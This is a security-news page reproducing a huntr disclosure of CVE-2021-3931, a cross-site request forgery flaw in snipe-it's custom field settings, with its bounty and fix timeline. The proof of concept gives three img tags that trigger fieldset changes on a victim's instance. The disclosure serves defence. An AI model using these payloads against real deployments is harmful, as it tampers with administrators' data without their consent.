Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-3931: huntr: Cross-Site Request Forgery (CSRF) PHP Vulnerability in snipe-it

snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)

CVE
#csrf#vulnerability#git

Valid

Description

CSRF in custom field settings

Proof of Concept

<img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
<img src="http://<SNIPE_IT_APP>/fields/required/3/3">
<img src="http://<SNIPE_IT_APP>/fields/optional/3/3">

Impact

This vulnerability is capable of trick admin user to modify custom forms

Occurences

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 8 days ago

We have contacted a member of the snipe/snipe-it team and are waiting to hear back 7 days ago

snipe validated this vulnerability 7 days ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

snipe confirmed that a fix has been merged on 0d811d 7 days ago

snipe has been awarded the fix bounty

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907